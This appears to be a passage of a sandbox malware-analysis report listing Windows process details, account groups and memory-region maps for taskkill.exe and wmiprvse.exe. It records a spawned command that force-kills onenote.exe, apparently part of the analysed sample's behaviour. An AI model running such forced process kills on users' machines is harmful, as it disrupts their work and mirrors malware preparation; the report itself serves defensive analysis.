Thread: id = 208 os_tid = 0xa30 Process: id = "23" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x71c9c000" os_pid = "0x3b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM onenote.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1754 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1755 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1756 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1757 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1758 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1759 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1760 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1761 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1762 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1763 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1764 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1765 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1766 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1767 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1768 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2082 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2083 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2084 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2085 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2086 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2087 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2088 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2089 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2090 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2091 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2092 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2093 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2094 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2095 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2096 start_va = 0x740000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2097 start_va = 0x1b40000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2098 start_va = 0x1bc0000 end_va = 0x1c7ffff entry_point = 0x1bc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2099 start_va = 0x1cc0000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 2100 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2101 start_va = 0x1dc0000 end_va = 0x208efff entry_point = 0x1dc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2102 start_va = 0x20f0000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 2103 start_va = 0x2230000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 2104 start_va = 0x2300000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2105 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2106 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2107 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2108 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2109 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2110 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2111 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2112 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2113 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2114 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2115 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2116 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2117 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2118 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2119 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2120 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2121 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2122 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2123 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2124 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2125 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2126 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2127 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2128 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2129 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2130 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2131 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2132 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2133 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2134 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2135 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2136 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2137 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2138 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2139 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2140 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2141 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2142 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2143 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2144 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 169 os_tid = 0x82c Thread: id = 191 os_tid = 0x918 Thread: id = 199 os_tid = 0x9b4 Thread: id = 203 os_tid = 0x9d4 Thread: id = 204 os_tid = 0x9f4 Process: id = "24" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x20de000" os_pid = "0xb44" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x374" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004d7a3" [0xc000000f] Region: id = 1681 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1682 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1683 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1684 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1685 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1686 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1687 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1688 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1689 start_va = 0xf0000 end_va = 0xf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1690 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1691 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1692 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1693 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1694 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1695 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1696 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1697 start_va = 0x550000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1698 start_va = 0x6e0000 end_va = 0x79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1699 start_va = 0x7f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1700 start_va = 0x870000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1701 start_va = 0x970000 end_va = 0xc3efff entry_point = 0x970000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1702 start_va = 0xc40000 end_va = 0x1032fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1703 start_va = 0x1040000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 1704 start_va = 0x1100000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1705 start_va = 0x1190000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1706 start_va = 0x1220000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 1707 start_va = 0x12e0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1708 start_va = 0x1430000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 1709 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1710 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1711 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1712 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1713 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1714 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1715 start_va = 0xff350000 end_va = 0xff3aefff entry_point = 0xff350000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1716 start_va = 0x7fef6e90000 end_va = 0x7fef6ea5fff entry_point = 0x7fef6e90000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1717 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1718 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1719 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1720 start_va = 0x7fef7360000 end_va = 0x7fef7441fff entry_point = 0x7fef7360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1721 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1722 start_va = 0x7fefb520000 end_va = 0x7fefb54cfff entry_point = 0x7fefb520000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1723 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1724 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1725 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1726 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1727 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1728 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1729 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1730 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1731 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1732 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1733 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1734 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1735 start_va = 0x7fefe1b0000 end_va = 0x7fefe201fff entry_point = 0x7fefe1b0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1736 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1737 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1738 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1739 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1740 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1741 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1742 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1743 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") 